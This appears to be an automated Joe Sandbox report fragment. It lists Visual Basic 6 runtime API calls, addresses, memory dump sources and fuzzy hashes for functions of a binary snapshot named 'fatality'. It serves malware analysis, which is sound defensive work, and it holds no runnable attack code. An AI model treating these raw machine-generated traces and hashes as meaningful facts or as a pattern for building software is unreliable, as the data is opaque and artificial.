                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004), ref: 00412B57
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 00412B5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00412B69
                                                                                                                                                            • __vbaI4Str.MSVBVM60(00000000), ref: 00412B70
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00412C00
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 277344030-0
                                                                                                                                                            • Opcode ID: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                            • Instruction ID: f355006ae09e1e352358bc31eb7e3acedda410367e126062bc5f553c60d2b707
                                                                                                                                                            • Opcode Fuzzy Hash: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                            • Instruction Fuzzy Hash: D891C8B1D00208EFDB04DFE4DE58BDEBBB4BB48305F208169E612B76A0DB745A45CB58
                                                                                                                                                            APIs
                                                                                                                                                            • #594.MSVBVM60(?,6CEBD9F5,-00000001,6CEBD8B1), ref: 0040EB1A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                            • #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
                                                                                                                                                            • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
                                                                                                                                                            • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
                                                                                                                                                            • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
                                                                                                                                                            • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
                                                                                                                                                            • #537.MSVBVM60(?,?), ref: 0040ED54
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
                                                                                                                                                            • #537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
                                                                                                                                                            • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EDEC
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                            • String ID: gfff$gfff
                                                                                                                                                            • API String ID: 2397813863-3084402119
                                                                                                                                                            • Opcode ID: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                            • Instruction ID: 69a6bd49322be43a13479f126592eb8a048afae0e7896bfb7d302a94b416162a
                                                                                                                                                            • Opcode Fuzzy Hash: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                            • Instruction Fuzzy Hash: CD9141B5E00208DBCB08DFB5DD89ADDBBBAEB88341F14453AE505F72A0DB345985CB94
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041089C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004108A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410999
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
                                                                                                                                                            • #517.MSVBVM60(?,?,00000000), ref: 004109DB
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
                                                                                                                                                            • #517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B24
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410B30
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3648932012-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0040C80D
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C81A
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1728155253-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                            • #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                            • #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                            • #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                            • #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
                                                                                                                                                            • String ID: VUUU$VUUU$gfff
                                                                                                                                                            • API String ID: 3310697333-2314002932
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,00000000,6CEE285F,6CED1654), ref: 00416456
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
                                                                                                                                                            • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2234381736-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
                                                                                                                                                            • #712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
                                                                                                                                                            • #712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
                                                                                                                                                            • #572.MSVBVM60(00004002), ref: 0040E969
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E974
                                                                                                                                                            • #537.MSVBVM60(00000020), ref: 0040E97F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E98A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9DA
                                                                                                                                                            • #712.MSVBVM60(?,00000000), ref: 0040E9E5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E9F0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040EA2E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040EAA2
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                            • String ID: $file:///
                                                                                                                                                            • API String ID: 1913684286-1087255347
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?), ref: 0040C984
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040CC42
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 435708370-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
